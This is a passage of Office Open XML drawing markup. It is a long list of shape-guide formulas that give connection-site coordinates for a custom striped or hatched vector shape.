              <a:gd name="connsiteX103" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY103" fmla="*/ 20738136 h 26946982"/>
              <a:gd name="connsiteX104" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY104" fmla="*/ 20371085 h 26946982"/>
              <a:gd name="connsiteX105" fmla="*/ 6575894 w 23952872"/>
              <a:gd name="connsiteY105" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX106" fmla="*/ 6455867 w 23952872"/>
              <a:gd name="connsiteY106" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX107" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY107" fmla="*/ 20491113 h 26946982"/>
              <a:gd name="connsiteX108" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY108" fmla="*/ 20124064 h 26946982"/>
              <a:gd name="connsiteX109" fmla="*/ 6822917 w 23952872"/>
              <a:gd name="connsiteY109" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX110" fmla="*/ 6702890 w 23952872"/>
              <a:gd name="connsiteY110" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX111" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY111" fmla="*/ 20244092 h 26946982"/>
              <a:gd name="connsiteX112" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY112" fmla="*/ 19877044 h 26946982"/>
              <a:gd name="connsiteX113" fmla="*/ 7069941 w 23952872"/>
              <a:gd name="connsiteY113" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX114" fmla="*/ 6949914 w 23952872"/>
              <a:gd name="connsiteY114" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX115" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY115" fmla="*/ 19997066 h 26946982"/>
              <a:gd name="connsiteX116" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY116" fmla="*/ 19630020 h 26946982"/>
              <a:gd name="connsiteX117" fmla="*/ 7316966 w 23952872"/>
              <a:gd name="connsiteY117" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX118" fmla="*/ 7196937 w 23952872"/>
              <a:gd name="connsiteY118" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX119" fmla="*/ 5 w 23952872"/>
              <a:gd name="connsiteY119" fmla="*/ 19750045 h 26946982"/>
              <a:gd name="connsiteX120" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY120" fmla="*/ 19382994 h 26946982"/>
              <a:gd name="connsiteX121" fmla="*/ 7563990 w 23952872"/>
              <a:gd name="connsiteY121" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX122" fmla="*/ 7443961 w 23952872"/>
              <a:gd name="connsiteY122" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX123" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY123" fmla="*/ 19503024 h 26946982"/>
              <a:gd name="connsiteX124" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY124" fmla="*/ 19135973 h 26946982"/>
              <a:gd name="connsiteX125" fmla="*/ 7811013 w 23952872"/>
              <a:gd name="connsiteY125" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX126" fmla="*/ 7690984 w 23952872"/>
              <a:gd name="connsiteY126" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX127" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY127" fmla="*/ 19256000 h 26946982"/>
              <a:gd name="connsiteX128" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY128" fmla="*/ 18888947 h 26946982"/>
              <a:gd name="connsiteX129" fmla="*/ 8058036 w 23952872"/>
              <a:gd name="connsiteY129" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX130" fmla="*/ 7938008 w 23952872"/>
              <a:gd name="connsiteY130" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX131" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY131" fmla="*/ 19008974 h 26946982"/>
              <a:gd name="connsiteX132" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY132" fmla="*/ 18641923 h 26946982"/>
              <a:gd name="connsiteX133" fmla="*/ 8305060 w 23952872"/>
              <a:gd name="connsiteY133" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX134" fmla="*/ 8185032 w 23952872"/>
              <a:gd name="connsiteY134" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX135" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY135" fmla="*/ 18761950 h 26946982"/>
              <a:gd name="connsiteX136" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY136" fmla="*/ 18394900 h 26946982"/>
              <a:gd name="connsiteX137" fmla="*/ 8552084 w 23952872"/>
              <a:gd name="connsiteY137" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX138" fmla="*/ 8432055 w 23952872"/>
              <a:gd name="connsiteY138" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX139" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY139" fmla="*/ 18514927 h 26946982"/>
              <a:gd name="connsiteX140" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY140" fmla="*/ 18147874 h 26946982"/>
              <a:gd name="connsiteX141" fmla="*/ 8799107 w 23952872"/>
              <a:gd name="connsiteY141" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX142" fmla="*/ 8679078 w 23952872"/>
              <a:gd name="connsiteY142" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX143" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY143" fmla="*/ 18267904 h 26946982"/>
              <a:gd name="connsiteX144" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY144" fmla="*/ 17900853 h 26946982"/>
              <a:gd name="connsiteX145" fmla="*/ 9046131 w 23952872"/>
              <a:gd name="connsiteY145" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX146" fmla="*/ 8926102 w 23952872"/>
              <a:gd name="connsiteY146" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX147" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY147" fmla="*/ 18020883 h 26946982"/>
              <a:gd name="connsiteX148" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY148" fmla="*/ 17653827 h 26946982"/>
              <a:gd name="connsiteX149" fmla="*/ 9293154 w 23952872"/>
              <a:gd name="connsiteY149" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX150" fmla="*/ 9173126 w 23952872"/>
              <a:gd name="connsiteY150" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX151" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY151" fmla="*/ 17773854 h 26946982"/>
              <a:gd name="connsiteX152" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY152" fmla="*/ 17406809 h 26946982"/>
              <a:gd name="connsiteX153" fmla="*/ 9540178 w 23952872"/>
              <a:gd name="connsiteY153" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX154" fmla="*/ 9420151 w 23952872"/>
              <a:gd name="connsiteY154" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX155" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY155" fmla="*/ 17526833 h 26946982"/>
              <a:gd name="connsiteX156" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY156" fmla="*/ 17159782 h 26946982"/>
              <a:gd name="connsiteX157" fmla="*/ 9787201 w 23952872"/>
              <a:gd name="connsiteY157" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX158" fmla="*/ 9667174 w 23952872"/>
              <a:gd name="connsiteY158" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX159" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY159" fmla="*/ 17279812 h 26946982"/>
              <a:gd name="connsiteX160" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY160" fmla="*/ 16912762 h 26946982"/>
              <a:gd name="connsiteX161" fmla="*/ 10034225 w 23952872"/>
              <a:gd name="connsiteY161" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX162" fmla="*/ 9914198 w 23952872"/>
              <a:gd name="connsiteY162" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX163" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY163" fmla="*/ 17032789 h 26946982"/>
              <a:gd name="connsiteX164" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY164" fmla="*/ 16665738 h 26946982"/>
              <a:gd name="connsiteX165" fmla="*/ 10281248 w 23952872"/>
              <a:gd name="connsiteY165" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX166" fmla="*/ 10161221 w 23952872"/>
              <a:gd name="connsiteY166" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX167" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY167" fmla="*/ 16785763 h 26946982"/>
              <a:gd name="connsiteX168" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY168" fmla="*/ 16418712 h 26946982"/>
              <a:gd name="connsiteX169" fmla="*/ 10528272 w 23952872"/>
              <a:gd name="connsiteY169" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX170" fmla="*/ 10408244 w 23952872"/>
              <a:gd name="connsiteY170" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX171" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY171" fmla="*/ 16538739 h 26946982"/>
              <a:gd name="connsiteX172" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY172" fmla="*/ 16171691 h 26946982"/>
              <a:gd name="connsiteX173" fmla="*/ 10775295 w 23952872"/>
              <a:gd name="connsiteY173" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX174" fmla="*/ 10655268 w 23952872"/>
              <a:gd name="connsiteY174" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX175" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY175" fmla="*/ 16291716 h 26946982"/>
              <a:gd name="connsiteX176" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY176" fmla="*/ 15924665 h 26946982"/>
              <a:gd name="connsiteX177" fmla="*/ 11022319 w 23952872"/>
              <a:gd name="connsiteY177" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX178" fmla="*/ 10902292 w 23952872"/>
              <a:gd name="connsiteY178" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX179" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY179" fmla="*/ 16044692 h 26946982"/>
              <a:gd name="connsiteX180" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY180" fmla="*/ 15677641 h 26946982"/>
              <a:gd name="connsiteX181" fmla="*/ 11269342 w 23952872"/>
              <a:gd name="connsiteY181" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX182" fmla="*/ 11149315 w 23952872"/>
              <a:gd name="connsiteY182" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX183" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY183" fmla="*/ 15797671 h 26946982"/>
              <a:gd name="connsiteX184" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY184" fmla="*/ 15430617 h 26946982"/>
              <a:gd name="connsiteX185" fmla="*/ 11516366 w 23952872"/>
              <a:gd name="connsiteY185" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX186" fmla="*/ 11396339 w 23952872"/>
              <a:gd name="connsiteY186" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX187" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY187" fmla="*/ 15550645 h 26946982"/>
              <a:gd name="connsiteX188" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY188" fmla="*/ 15183594 h 26946982"/>
              <a:gd name="connsiteX189" fmla="*/ 11763389 w 23952872"/>
              <a:gd name="connsiteY189" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX190" fmla="*/ 11643362 w 23952872"/>
              <a:gd name="connsiteY190" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX191" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY191" fmla="*/ 15303622 h 26946982"/>
              <a:gd name="connsiteX192" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY192" fmla="*/ 14936570 h 26946982"/>
              <a:gd name="connsiteX193" fmla="*/ 12010413 w 23952872"/>
              <a:gd name="connsiteY193" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX194" fmla="*/ 11890386 w 23952872"/>
              <a:gd name="connsiteY194" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX195" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY195" fmla="*/ 15056601 h 26946982"/>
              <a:gd name="connsiteX196" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY196" fmla="*/ 14689549 h 26946982"/>
              <a:gd name="connsiteX197" fmla="*/ 12257436 w 23952872"/>
              <a:gd name="connsiteY197" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX198" fmla="*/ 12137409 w 23952872"/>
              <a:gd name="connsiteY198" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX199" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY199" fmla="*/ 14809575 h 26946982"/>
              <a:gd name="connsiteX200" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY200" fmla="*/ 14442523 h 26946982"/>
              <a:gd name="connsiteX201" fmla="*/ 12504459 w 23952872"/>
              <a:gd name="connsiteY201" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX202" fmla="*/ 12384433 w 23952872"/>
              <a:gd name="connsiteY202" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX203" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY203" fmla="*/ 14562548 h 26946982"/>
              <a:gd name="connsiteX204" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY204" fmla="*/ 14195499 h 26946982"/>
              <a:gd name="connsiteX205" fmla="*/ 12751483 w 23952872"/>
              <a:gd name="connsiteY205" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX206" fmla="*/ 12631456 w 23952872"/>
              <a:gd name="connsiteY206" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX207" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY207" fmla="*/ 14315527 h 26946982"/>
              <a:gd name="connsiteX208" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY208" fmla="*/ 13948476 h 26946982"/>
              <a:gd name="connsiteX209" fmla="*/ 12998507 w 23952872"/>
              <a:gd name="connsiteY209" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX210" fmla="*/ 12878479 w 23952872"/>
              <a:gd name="connsiteY210" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX211" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY211" fmla="*/ 14068504 h 26946982"/>
              <a:gd name="connsiteX212" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY212" fmla="*/ 13701450 h 26946982"/>
              <a:gd name="connsiteX213" fmla="*/ 13245530 w 23952872"/>
              <a:gd name="connsiteY213" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX214" fmla="*/ 13125503 w 23952872"/>
              <a:gd name="connsiteY214" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX215" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY215" fmla="*/ 13821481 h 26946982"/>
              <a:gd name="connsiteX216" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY216" fmla="*/ 13454429 h 26946982"/>
              <a:gd name="connsiteX217" fmla="*/ 13492554 w 23952872"/>
              <a:gd name="connsiteY217" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX218" fmla="*/ 13372527 w 23952872"/>
              <a:gd name="connsiteY218" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX219" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY219" fmla="*/ 13574454 h 26946982"/>
              <a:gd name="connsiteX220" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY220" fmla="*/ 13207406 h 26946982"/>
              <a:gd name="connsiteX221" fmla="*/ 13739577 w 23952872"/>
              <a:gd name="connsiteY221" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX222" fmla="*/ 13619550 w 23952872"/>
              <a:gd name="connsiteY222" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX223" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY223" fmla="*/ 13327433 h 26946982"/>
              <a:gd name="connsiteX224" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY224" fmla="*/ 12960382 h 26946982"/>
              <a:gd name="connsiteX225" fmla="*/ 13986601 w 23952872"/>
              <a:gd name="connsiteY225" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX226" fmla="*/ 13866574 w 23952872"/>
              <a:gd name="connsiteY226" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX227" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY227" fmla="*/ 13080409 h 26946982"/>
              <a:gd name="connsiteX228" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY228" fmla="*/ 12713358 h 26946982"/>
              <a:gd name="connsiteX229" fmla="*/ 14233624 w 23952872"/>
              <a:gd name="connsiteY229" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX230" fmla="*/ 14113597 w 23952872"/>
              <a:gd name="connsiteY230" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX231" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY231" fmla="*/ 12833386 h 26946982"/>
              <a:gd name="connsiteX232" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY232" fmla="*/ 12466338 h 26946982"/>
              <a:gd name="connsiteX233" fmla="*/ 14480648 w 23952872"/>
              <a:gd name="connsiteY233" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX234" fmla="*/ 14360621 w 23952872"/>
              <a:gd name="connsiteY234" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX235" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY235" fmla="*/ 12586359 h 26946982"/>
              <a:gd name="connsiteX236" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY236" fmla="*/ 12219312 h 26946982"/>
              <a:gd name="connsiteX237" fmla="*/ 14727671 w 23952872"/>
              <a:gd name="connsiteY237" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX238" fmla="*/ 14607644 w 23952872"/>
              <a:gd name="connsiteY238" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX239" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY239" fmla="*/ 12339339 h 26946982"/>
              <a:gd name="connsiteX240" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY240" fmla="*/ 11972285 h 26946982"/>
              <a:gd name="connsiteX241" fmla="*/ 14974695 w 23952872"/>
              <a:gd name="connsiteY241" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX242" fmla="*/ 14854668 w 23952872"/>
              <a:gd name="connsiteY242" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX243" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY243" fmla="*/ 12092315 h 26946982"/>
              <a:gd name="connsiteX244" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY244" fmla="*/ 11725265 h 26946982"/>
              <a:gd name="connsiteX245" fmla="*/ 15221718 w 23952872"/>
              <a:gd name="connsiteY245" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX246" fmla="*/ 15101691 w 23952872"/>
              <a:gd name="connsiteY246" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX247" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY247" fmla="*/ 11845292 h 26946982"/>
              <a:gd name="connsiteX248" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY248" fmla="*/ 11478241 h 26946982"/>
              <a:gd name="connsiteX249" fmla="*/ 15468742 w 23952872"/>
              <a:gd name="connsiteY249" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX250" fmla="*/ 15348715 w 23952872"/>
              <a:gd name="connsiteY250" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX251" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY251" fmla="*/ 11598268 h 26946982"/>
              <a:gd name="connsiteX252" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY252" fmla="*/ 11231218 h 26946982"/>
              <a:gd name="connsiteX253" fmla="*/ 15715765 w 23952872"/>
              <a:gd name="connsiteY253" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX254" fmla="*/ 15595738 w 23952872"/>
              <a:gd name="connsiteY254" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX255" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY255" fmla="*/ 11351245 h 26946982"/>
              <a:gd name="connsiteX256" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY256" fmla="*/ 10984191 h 26946982"/>
              <a:gd name="connsiteX257" fmla="*/ 15962789 w 23952872"/>
              <a:gd name="connsiteY257" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX258" fmla="*/ 15842762 w 23952872"/>
              <a:gd name="connsiteY258" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX259" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY259" fmla="*/ 11104221 h 26946982"/>
              <a:gd name="connsiteX260" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY260" fmla="*/ 10737170 h 26946982"/>
              <a:gd name="connsiteX261" fmla="*/ 16209812 w 23952872"/>
              <a:gd name="connsiteY261" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX262" fmla="*/ 16089785 w 23952872"/>
              <a:gd name="connsiteY262" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX263" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY263" fmla="*/ 10857198 h 26946982"/>
              <a:gd name="connsiteX264" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY264" fmla="*/ 10490147 h 26946982"/>
              <a:gd name="connsiteX265" fmla="*/ 16456836 w 23952872"/>
              <a:gd name="connsiteY265" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX266" fmla="*/ 16336809 w 23952872"/>
              <a:gd name="connsiteY266" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX267" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY267" fmla="*/ 10610174 h 26946982"/>
              <a:gd name="connsiteX268" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY268" fmla="*/ 10243123 h 26946982"/>
              <a:gd name="connsiteX269" fmla="*/ 16703862 w 23952872"/>
              <a:gd name="connsiteY269" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX270" fmla="*/ 16583838 w 23952872"/>
              <a:gd name="connsiteY270" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX271" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY271" fmla="*/ 10363151 h 26946982"/>
              <a:gd name="connsiteX272" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY272" fmla="*/ 9996100 h 26946982"/>
              <a:gd name="connsiteX273" fmla="*/ 16950889 w 23952872"/>
              <a:gd name="connsiteY273" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX274" fmla="*/ 16830861 w 23952872"/>
              <a:gd name="connsiteY274" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX275" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY275" fmla="*/ 10116127 h 26946982"/>
              <a:gd name="connsiteX276" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY276" fmla="*/ 9749076 h 26946982"/>
              <a:gd name="connsiteX277" fmla="*/ 17197906 w 23952872"/>
              <a:gd name="connsiteY277" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX278" fmla="*/ 17077879 w 23952872"/>
              <a:gd name="connsiteY278" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX279" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY279" fmla="*/ 9869104 h 26946982"/>
              <a:gd name="connsiteX280" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY280" fmla="*/ 9502053 h 26946982"/>
              <a:gd name="connsiteX281" fmla="*/ 17444930 w 23952872"/>
              <a:gd name="connsiteY281" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX282" fmla="*/ 17324903 w 23952872"/>
              <a:gd name="connsiteY282" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX283" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY283" fmla="*/ 9622080 h 26946982"/>
              <a:gd name="connsiteX284" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY284" fmla="*/ 9255029 h 26946982"/>
              <a:gd name="connsiteX285" fmla="*/ 17691953 w 23952872"/>
              <a:gd name="connsiteY285" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX286" fmla="*/ 17571926 w 23952872"/>
              <a:gd name="connsiteY286" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX287" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY287" fmla="*/ 9375057 h 26946982"/>
              <a:gd name="connsiteX288" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY288" fmla="*/ 9008006 h 26946982"/>
              <a:gd name="connsiteX289" fmla="*/ 17938977 w 23952872"/>
              <a:gd name="connsiteY289" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX290" fmla="*/ 17818950 w 23952872"/>
              <a:gd name="connsiteY290" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX291" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY291" fmla="*/ 9128033 h 26946982"/>
              <a:gd name="connsiteX292" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY292" fmla="*/ 8760982 h 26946982"/>
              <a:gd name="connsiteX293" fmla="*/ 18186000 w 23952872"/>
              <a:gd name="connsiteY293" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX294" fmla="*/ 18065973 w 23952872"/>
              <a:gd name="connsiteY294" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX295" fmla="*/ 2 w 23952872"/>
              <a:gd name="connsiteY295" fmla="*/ 8881007 h 26946982"/>
              <a:gd name="connsiteX296" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY296" fmla="*/ 8513959 h 26946982"/>
              <a:gd name="connsiteX297" fmla="*/ 18433024 w 23952872"/>
              <a:gd name="connsiteY297" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX298" fmla="*/ 18312997 w 23952872"/>
              <a:gd name="connsiteY298" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX299" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY299" fmla="*/ 8633986 h 26946982"/>
              <a:gd name="connsiteX300" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY300" fmla="*/ 8266935 h 26946982"/>
              <a:gd name="connsiteX301" fmla="*/ 18680047 w 23952872"/>
              <a:gd name="connsiteY301" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX302" fmla="*/ 18560020 w 23952872"/>
              <a:gd name="connsiteY302" fmla="*/ 26946978 h 26946982"/>
              <a:gd name="connsiteX303" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY303" fmla="*/ 8386962 h 26946982"/>
              <a:gd name="connsiteX304" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY304" fmla="*/ 8019911 h 26946982"/>
              <a:gd name="connsiteX305" fmla="*/ 18927074 w 23952872"/>
              <a:gd name="connsiteY305" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX306" fmla="*/ 18807046 w 23952872"/>
              <a:gd name="connsiteY306" fmla="*/ 26946976 h 26946982"/>
              <a:gd name="connsiteX307" fmla="*/ 7 w 23952872"/>
              <a:gd name="connsiteY307" fmla="*/ 8139941 h 26946982"/>
              <a:gd name="connsiteX308" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY308" fmla="*/ 7772886 h 26946982"/>
              <a:gd name="connsiteX309" fmla="*/ 19174099 w 23952872"/>
              <a:gd name="connsiteY309" fmla="*/ 26946980 h 26946982"/>
              <a:gd name="connsiteX310" fmla="*/ 19054070 w 23952872"/>
              <a:gd name="connsiteY310" fmla="*/ 26946982 h 26946982"/>
              <a:gd name="connsiteX311" fmla="*/ 3 w 23952872"/>
              <a:gd name="connsiteY311" fmla="*/ 7892915 h 26946982"/>
              <a:gd name="connsiteX312" fmla="*/ 4 w 23952872"/>
              <a:gd name="connsiteY312" fmla="*/ 7525863 h 26946982"/>
              <a:gd name="connsiteX313" fmla="*/ 19421123 w 23952872"/>
              <a:gd name="connsiteY313" fmla="*/ 26946978 h 26946982"/>
